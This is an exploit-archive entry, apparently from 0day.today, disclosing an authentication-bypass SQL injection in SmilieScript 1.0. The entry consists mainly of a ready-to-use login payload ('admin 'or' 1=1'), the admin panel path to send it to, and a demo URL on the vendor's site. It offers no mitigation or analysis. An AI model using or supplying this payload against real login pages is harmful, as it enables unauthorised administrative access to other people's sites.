id: 5638
date: 08/09/2009
title: SmilieScript <= 1.0 (Auth Bypass) SQL Injection Vulnerability
author: Mr.tro0oqy
cves: 

=============================================================
SmilieScript <= 1.0 (Auth Bypass) SQL Injection Vulnerability
=============================================================


=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :SmilieScript <= 1.0 (Auth Bypass) SQL injection Valunrability

[+] Script site : http://www.smiliescript.com

[+] Found by : Mr.tro0oqy  
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------

[»] Exploit : admin 'or' 1=1


[»] Cpanel : www.xxx.com/path/admin


Demo:
-----
http://www.smiliescript.com/demo
-----



#  0day.today [2023-03-25]  #